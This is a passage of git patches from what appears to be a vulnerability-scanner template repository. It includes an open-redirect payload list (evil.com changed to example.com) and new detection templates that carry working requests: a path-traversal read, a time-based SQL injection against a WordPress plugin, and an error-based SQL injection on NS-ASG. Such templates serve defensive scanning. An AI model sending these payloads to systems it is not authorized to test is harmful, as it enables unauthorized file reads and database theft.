'//%69%6e%74%65%72%61%63%74%2e%73%68' - - '//evil.com@//' - - '//evil.com\tevil.com/' - - '//https://evil.com//' - - '/<>//evil.com' - - '/\/\/evil.com/' - - '/\/evil.com' - - '/\evil.com' - - '/evil.com' - - '/evil.com/%2F..' - - '/evil.com/' - - '/evil.com/..;/css' - - '/https:evil.com' - - '/{{RootURL}}evil.com/' - - '/〱evil.com' - - '/〵evil.com' - - '/ゝevil.com' - - '/ーevil.com' - - '/ーevil.com' - - '<>//evil.com' - - '@evil.com' - - '@https://evil.com' - - '\/\/evil.com/' - - 'evil%E3%80%82com' - - 'evil.com' - - 'evil.com/' - - 'evil.com//' - - 'evil.com;@' - - 'https%3a%2f%2fevil.com%2f' - - 'https:%0a%0devil.com' - - 'https://%0a%0devil.com' - - 'https://%09/evil.com' - - 'https://%2f%2f.evil.com/' - - 'https://%3F.evil.com/' - - 'https://%5c%5c.evil.com/' - - 'https://%5cevil.com@' - - 'https://%23.evil.com/' - - 'https://.evil.com' - - 'https://////evil.com' - - 'https:///evil.com' - - 'https:///evil.com/%2e%2e' - - 'https:///evil.com/%2f%2e%2e' - - 'https:///evil.com@evil.com/%2e%2e' - - 'https:///evil.com@evil.com/%2f%2e%2e' - - 'https://:80#@evil.com/' - - 'https://:80?@evil.com/' - - 'https://:@\@evil.com' - - 'https://:@evil.com\@evil.com' - - 'https://;@evil.com' - - 'https://\tevil.com/' - - 'https://evil.com/evil.com' - - 'https://evil.com/https://evil.com/' - - 'https://www.\.evil.com' - - 'https:/\/\evil.com' - - 'https:/\evil.com' - - 'https:/evil.com' - - 'https:evil.com' - - '{{RootURL}}evil.com' - - '〱evil.com' - - '〵evil.com' - - 'ゝevil.com' - - 'ーevil.com' - - 'ーevil.com' - - 'redirect/evil.com' - - 'cgi-bin/redirect.cgi?evil.com' - - 'out?evil.com' - - 'login?to=http://evil.com' - - '1/_https@evil.com' - - 'redirect?targeturl=https://evil.com' + - '//example.com@//' + - '//example.com\texample.com/' + - '//https://example.com//' + - '/<>//example.com' + - '/\/\/example.com/' + - '/\/example.com' + - '/\example.com' + - '/example.com' + - '/example.com/%2F..' + - '/example.com/' + - '/example.com/..;/css' + - '/https:example.com' + - '/{{RootURL}}example.com/' + - '/〱example.com' + - '/〵example.com' + - '/ゝexample.com' + - '/ーexample.com' + - '/ーexample.com' + - '<>//example.com' + - '@example.com' + - '@https://example.com' + - '\/\/example.com/' + - 'example%E3%80%82com' + - 'example.com' + - 'example.com/' + - 'example.com//' + - 'example.com;@' + - 'https%3a%2f%2fexample.com%2f' + - 'https:%0a%0dexample.com' + - 'https://%0a%0dexample.com' + - 'https://%09/example.com' + - 'https://%2f%2f.example.com/' + - 'https://%3F.example.com/' + - 'https://%5c%5c.example.com/' + - 'https://%5cexample.com@' + - 'https://%23.example.com/' + - 'https://.example.com' + - 'https://////example.com' + - 'https:///example.com' + - 'https:///example.com/%2e%2e' + - 'https:///example.com/%2f%2e%2e' + - 'https:///example.com@example.com/%2e%2e' + - 'https:///example.com@example.com/%2f%2e%2e' + - 'https://:80#@example.com/' + - 'https://:80?@example.com/' + - 'https://:@\@example.com' + - 'https://:@example.com\@example.com' + - 'https://;@example.com' + - 'https://\texample.com/' + - 'https://example.com/example.com' + - 'https://example.com/https://example.com/' + - 'https://www.\.example.com' + - 'https:/\/\example.com' + - 'https:/\example.com' + - 'https:/example.com' + - 'https:example.com' + - '{{RootURL}}example.com' + - '〱example.com' + - '〵example.com' + - 'ゝexample.com' + - 'ーexample.com' + - 'ーexample.com' + - 'redirect/example.com' + - 'cgi-bin/redirect.cgi?example.com' + - 'out?example.com' + - 'login?to=http://example.com' + - '1/_https@example.com' + - 'redirect?targeturl=https://example.com' stop-at-first-match: true @@ -121,7 +121,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: @@ -130,4 +130,4 @@ http: - 307 - 308 condition: or -# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4fe9201a11ea90485c2a26c406a0dbecb9ea8e674bf3ccbcaf01ed4c57421c3022100a9c075d4a231b4acd4adfce87b2f858c65cb9dc3b896d7b07759c4395e0be18f:922c64590222798bb761d5b6d8e72950 From 7d235a1783654ccdb923c27554ed878a8eaf3bad Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Jul 2024 15:58:52 +0530 Subject: [PATCH 056/247] Create CVE-2022-45269.yaml --- http/cves/2022/CVE-2022-45269.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2022/CVE-2022-45269.yaml diff --git a/http/cves/2022/CVE-2022-45269.yaml b/http/cves/2022/CVE-2022-45269.yaml new file mode 100644 index 00000000000..034a50c08d5 --- /dev/null +++ b/http/cves/2022/CVE-2022-45269.yaml @@ -0,0 +1,41 @@ +id: CVE-2022-45269 + +info: + name: Linx Sphere - Directory Traversal + author: robotshell + severity: high + description: | + A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-45269 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-45269 + cwe-id: CWE-22 + epss-score: 0.00238 + epss-percentile: 0.62196 + cpe: cpe:2.3:a:gmaolinx:linx_sphere:7.35.st15:*:*:*:*:*:*:* + metadata: + vendor: gmaolinx + product: linx_sphere + fofa-query: "SCS.Web.Server.SPI/1.0" + verified: true + max-request: 1 + tags: cve,cve2022,linx,lfi,scs + +http: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../windows/iis.log" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Component Based Setup" + + - type: status + status: + - 200 From bdc11f6dd51c0818510aa1a3c3cfcbebb29892ee Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 10:33:53 +0000 Subject: [PATCH 057/247] Auto Generated New Template Addition List [Thu Jul 11 10:33:53 UTC 2024] :robot: From 363df1333838cd73b0facb657f2d027092136a29 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 10:34:02 +0000 Subject: [PATCH 058/247] Auto Generated Templates Checksum [Thu Jul 11 10:34:02 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c4980c8234e..c10910e641b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3189,7 +3189,7 @@ http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f http/cves/2023/CVE-2023-35159.yaml:9f8fc8da01c8040e353b9610eb25ec936e90babb http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 -http/cves/2023/CVE-2023-35161.yaml:fa11ab42365fadb4cc5d8cdd38720d6f001ea994 +http/cves/2023/CVE-2023-35161.yaml:668551d8aeaeb39fa7e104e72eb27a2a115ffdc2 http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -8695,7 +8695,7 @@ network/cves/2001/CVE-2001-1473.yaml:febab57b73d417adcee7535327476a56b072adb4 network/cves/2011/CVE-2011-2523.yaml:39eba544ecf40cd742e5042c18c9f28b07d73c58 network/cves/2015/CVE-2015-3306.yaml:9f687f191fa20b97861ec04cb5acfe798248f611 network/cves/2016/CVE-2016-2004.yaml:19c23411a63774a87b8e604d0bf08fe083eb1614 -network/cves/2016/CVE-2016-3510.yaml:e467641144cd548948ef78b7e95ae2d692f0362a +network/cves/2016/CVE-2016-3510.yaml:1863484c0587cb78f50142c006f4c76b9bb93f18 network/cves/2017/CVE-2017-3881.yaml:b814b5ded3051d4eaec01c4a486fac3ac4abffa7 network/cves/2017/CVE-2017-5645.yaml:693cc474f86c8081efc4e66545dc41a046fe2a5a network/cves/2018/CVE-2018-2628.yaml:c1e2d99c2938bf24dbc6d38523702fc408b1472a @@ -8867,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b748c4b3a95fd74ac14a2b627b759eba660f41ad +templates-checksum.txt:f8668e71b502b435ce1feef6124aa09978815aa5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a50ba2a3d2bf3d66ef7632cde6fdc5a0181afb21 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 10:35:45 +0000 Subject: [PATCH 059/247] Auto Template Signing [Thu Jul 11 10:35:45 UTC 2024] :robot: --- http/cves/2023/CVE-2023-35161.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-35161.yaml b/http/cves/2023/CVE-2023-35161.yaml index 702f0126aed..58f2ac723cd 100644 --- a/http/cves/2023/CVE-2023-35161.yaml +++ b/http/cves/2023/CVE-2023-35161.yaml @@ -55,4 +55,4 @@ http: status: - 200 - 401 -# digest: 490a004630440220754ce20184edbf704cd6f1e7e69a70f61dfa7503c16e166e04bb380a7576fca7022040bb69bfb99ba4aa9a3465fc7765917ae85b4e2f6fcd05c3789e9b5b41468356:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c7bcbe16baa8a21f333fa5ed379a8884065a1239c5b0b7383f9e4f90b9639cc502203ae5145579fb561fd26d924299d10301713b0e23f6ad0f61629ac35245b294aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5aa62fd2c5a5a83918d894966e2414c91e37d79d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 11:05:06 +0000 Subject: [PATCH 060/247] Auto Generated New Template Addition List [Thu Jul 11 11:05:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 56a631c95e2..9f4492b6f38 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-4220.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 30b704543ee117347e49eb4bdcf3514e02693eee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 11:05:12 +0000 Subject: [PATCH 061/247] Auto Generated Templates Checksum [Thu Jul 11 11:05:12 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c10910e641b..32ad59b48b9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2953,6 +2953,7 @@ http/cves/2022/CVE-2022-44952.yaml:c629ee34322ee56610296866a376746cae941860 http/cves/2022/CVE-2022-44957.yaml:097dbdc04c9ec9d0a8917061295cb399d2eb77e8 http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 +http/cves/2022/CVE-2022-45269.yaml:42c23aec173e5c280fc5e053fb6f3773c06a0202 http/cves/2022/CVE-2022-45354.yaml:e3388e631771c460f4ce83eab6279d2497c2e190 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 http/cves/2022/CVE-2022-45365.yaml:f637eb5c57aab39ea572b90b5f0c5519f06e8ed1 @@ -3189,7 +3190,7 @@ http/cves/2023/CVE-2023-35156.yaml:72c2e061bd7264a8e88e39bed12978ba41608ad8 http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f http/cves/2023/CVE-2023-35159.yaml:9f8fc8da01c8040e353b9610eb25ec936e90babb http/cves/2023/CVE-2023-35160.yaml:18c32e9c618ae99d50b0d2772e2196b575e2ba36 -http/cves/2023/CVE-2023-35161.yaml:668551d8aeaeb39fa7e104e72eb27a2a115ffdc2 +http/cves/2023/CVE-2023-35161.yaml:d3e86a15a6240c0806b2503462384f4fc41f790d http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 @@ -8867,7 +8868,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f8668e71b502b435ce1feef6124aa09978815aa5 +templates-checksum.txt:00c5eea4535afc542fbd095a5206e4b52ede0bea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2000b9c1b0dbc8db06a977f218719e1508ed30cc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 11:05:57 +0000 Subject: [PATCH 062/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b3ea198a56e..bdccb66e70d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' From e1e4855c20b139600fd7935faf9a3d37ba0c02f4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 11:06:55 +0000 Subject: [PATCH 063/247] Auto Template Signing [Thu Jul 11 11:06:55 UTC 2024] :robot: --- http/cves/2022/CVE-2022-45269.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-45269.yaml b/http/cves/2022/CVE-2022-45269.yaml index 034a50c08d5..382b467eff9 100644 --- a/http/cves/2022/CVE-2022-45269.yaml +++ b/http/cves/2022/CVE-2022-45269.yaml @@ -39,3 +39,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100e41332608c7eb41673c7ccc760e661b7ee1682c3b66657f1083139b73b589b3302200d2d8767fbcfb0cd5bacdc48f0dde25a600b06ac775ee14b5d23be286c8be450:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fed4fae646d6626245840b07df40d644aae8426a Mon Sep 17 00:00:00 2001 From: Youngho Kim Date: Thu, 11 Jul 2024 20:49:48 +0900 Subject: [PATCH 064/247] Add 'error.ghost.org' to Ghost.io takeover --- http/takeovers/ghost-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index a29c5b833f0..33f93397a46 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -25,6 +25,7 @@ http: - type: word part: header words: + - 'error.ghost.org' - 'offline.ghost.org' - type: status @@ -35,4 +36,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" -# digest: 4a0a00473045022100ef6e9387b76c6b0d10b0bb7578cabcb6318183cb7aa0a96921c7cccb3d23f19f02205779e8fdd4e525c1f6fdb6d24bdf06d512233517910e22958b12fa01ba90f2c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef6e9387b76c6b0d10b0bb7578cabcb6318183cb7aa0a96921c7cccb3d23f19f02205779e8fdd4e525c1f6fdb6d24bdf06d512233517910e22958b12fa01ba90f2c5:922c64590222798bb761d5b6d8e72950 From 186996f442410b875731488022d7974b7b003d2c Mon Sep 17 00:00:00 2001 From: Youngho Kim Date: Thu, 11 Jul 2024 20:56:26 +0900 Subject: [PATCH 065/247] Add condition --- http/takeovers/ghost-takeover.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index 33f93397a46..d38eab76196 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -27,6 +27,7 @@ http: words: - 'error.ghost.org' - 'offline.ghost.org' + condition: or - type: status status: From d5ea790220850efe01b4309abba0362355c31aaa Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Jul 2024 12:43:11 +0000 Subject: [PATCH 066/247] Auto Generated New Template Addition List [Thu Jul 11 12:43:11 UTC 2024] :robot: From 69cabc4528d141f1156ca6431bbe007ed158d6d5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 12:43:19 +0000 Subject: [PATCH 067/247] Auto Generated Templates Checksum [Thu Jul 11 12:43:19 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 32ad59b48b9..9df343d362c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2953,7 +2953,7 @@ http/cves/2022/CVE-2022-44952.yaml:c629ee34322ee56610296866a376746cae941860 http/cves/2022/CVE-2022-44957.yaml:097dbdc04c9ec9d0a8917061295cb399d2eb77e8 http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 -http/cves/2022/CVE-2022-45269.yaml:42c23aec173e5c280fc5e053fb6f3773c06a0202 +http/cves/2022/CVE-2022-45269.yaml:917d3565d19ef490508b45c7370fe78855755525 http/cves/2022/CVE-2022-45354.yaml:e3388e631771c460f4ce83eab6279d2497c2e190 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 http/cves/2022/CVE-2022-45365.yaml:f637eb5c57aab39ea572b90b5f0c5519f06e8ed1 @@ -6806,7 +6806,7 @@ http/takeovers/flexbe-takeover.yaml:617163c63ffb59ec2f94d4d5fd7995f27b261f1a http/takeovers/frontify-takeover.yaml:8e7b5944d4ea9cd2bfe1c0a53c3f4afb8cd1c5e1 http/takeovers/gemfury-takeover.yaml:99b2b5e97eb4d80e85058d39901e90611ba65fef http/takeovers/getresponse-takeover.yaml:3a585afe9dd14bb01f7a50f731c88bc14e2e45db -http/takeovers/ghost-takeover.yaml:58f195a61e50b65af5dcd5450a72b997c792c5ab +http/takeovers/ghost-takeover.yaml:c5db48048e83b4fa1a15b1493ff3ab5ad62c33cc http/takeovers/gitbook-takeover.yaml:92f9bbccaed9efd292242faf2c71df9c3eafb2dc http/takeovers/github-takeover.yaml:386272c1ca1c25f4611d5bce83ea3655b7a40273 http/takeovers/gohire-takeover.yaml:b2142614c80428b9e20d4d1f7c578f37bac2569f @@ -8868,7 +8868,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:00c5eea4535afc542fbd095a5206e4b52ede0bea +templates-checksum.txt:00f9ac5ff7e60a1926d41ecef62b601de76a6738 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 00c6040fa646ad77774765571846523e0cb70a8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 12:45:03 +0000 Subject: [PATCH 068/247] Auto Template Signing [Thu Jul 11 12:45:03 UTC 2024] :robot: --- http/takeovers/ghost-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index d38eab76196..ca4d0851995 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -37,4 +37,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" -# digest: 4a0a00473045022100ef6e9387b76c6b0d10b0bb7578cabcb6318183cb7aa0a96921c7cccb3d23f19f02205779e8fdd4e525c1f6fdb6d24bdf06d512233517910e22958b12fa01ba90f2c5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207d91f932ce2ed1fc8924b00af9eb0c421fc0b92e0853f8fba2bae8afbbadea8a022100bf5af14ddb7c21368dd33249a39ab3b3932b4b75d1abb3bb8f75367529854309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2dfc775ed7ea5957a5e39ed94830463fc7240180 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 11 Jul 2024 17:11:16 +0300 Subject: [PATCH 069/247] add CVE-2024-1512 --- http/cves/2024/CVE-2024-1512.yaml | 44 +++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1512.yaml diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml new file mode 100644 index 00000000000..63f6a87343b --- /dev/null +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-1512 + +info: + name: MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The MasterStudy LMS WordPress Plugin for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + remediation: Fixed in 3.2.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-1512 + - https://github.com/rat-c/CVE-2024-1512 + - https://blog.csdn.net/m0_60571842/article/details/139901296 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-1512 + epss-score: 0.00043 + epss-percentile: 0.09257 + metadata: + verified: true + max-request: 2 + vendor: stylemixthemes + product: masterstudy_lms + framework: wordpress + fofa-query: body="wp-content/plugins/masterstudy-lms-learning-management-system/" + tags: cve,cve2024,sqli,wp-plugin,wordpress + +http: + - raw: + - | + @timeout 30s + GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains_all(body,"items","total","total_price") && contains(header,"application/json")' + - 'status_code == 200' + condition: and From 80737f13c62240857a8d816c5f3755a617fee355 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Thu, 11 Jul 2024 17:28:46 +0200 Subject: [PATCH 070/247] Update gradle-cache-node-detect.yaml --- .../gradle/gradle-cache-node-detect.yaml | 22 +++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml index b507605d4c9..d4a3b93d628 100644 --- a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml +++ b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml @@ -2,32 +2,36 @@ id: gradle-cache-node-detect info: name: Gradle Enterprise Build Cache Node Login Panel - Detect - author: Adam Crosser + author: Adam Crosser,righettod severity: info description: Gradle Enterprise Build Cache Node login panel was detected. reference: - - https://gradle.com + - https://gradle.com/gradle-enterprise-solutions/build-cache/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,gradle,cache + verified: true + shodan-query: http.html:"Gradle Enterprise Build Cache Node" + tags: panel,gradle,detect http: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers: - - type: regex - regex: - - "Gradle Enterprise Build Cache Node (.*)" + - type: dsl + dsl: + - 'status_code == 200 || status_code == 401' + - 'contains_any(to_lower(body), "gradle enterprise build cache node", "com.gradle.error.fallback")' + condition: and extractors: - type: regex part: body group: 1 regex: - - "Gradle Enterprise Build Cache Node (.*)" -# digest: 4b0a004830460221008dbdc2d78f296e38531085c0f85a1047485cad55a664d50c4c809349f0932728022100be5036f154a06dc26a667d3600144487619fd4d8c4df4f4936e1dd768710f0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?i)"applicationVersion":"([0-9.]+)"' + - '(?i)Gradle\s+Enterprise\s+Build\s+Cache\s+Node\s+([0-9.]+)' From 18fd01a5711ce637a4633b82341b012d92193118 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 11 Jul 2024 18:30:35 +0300 Subject: [PATCH 071/247] add CVE-2024-2330 --- http/cves/2024/CVE-2024-2330.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-2330.yaml diff --git a/http/cves/2024/CVE-2024-2330.yaml b/http/cves/2024/CVE-2024-2330.yaml new file mode 100644 index 00000000000..5a340c44ae0 --- /dev/null +++ b/http/cves/2024/CVE-2024-2330.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-2330 + +info: + name: NS-ASG Application Security Gateway 6.3 - Sql Injection + author: securityforeveryone + severity: medium + description: | + A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330 + - https://nvd.nist.gov/vuln/detail/CVE-2024-2330 + - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md + - https://vuldb.com/?ctiid.256281 + - https://vuldb.com/?id.256281 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-2330 + cwe-id: CWE-89 + epss-score: 0.00045 + epss-percentile: 0.15866 + metadata: + max-request: 2 + shodan-query: http.title:“NS-ASG” + fofa-query: app="网康科技-NS-ASG安全网关" + tags: cve,cve2024,ns-asg,sqli + +http: + - raw: + - | + POST /protocol/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")' + - 'status_code == 200' + condition: and From c3523f269b595e8a110d8ab771f551e48ed290ea Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Thu, 11 Jul 2024 17:30:43 +0200 Subject: [PATCH 072/247] Better filtering of old IE-only http scripts --- 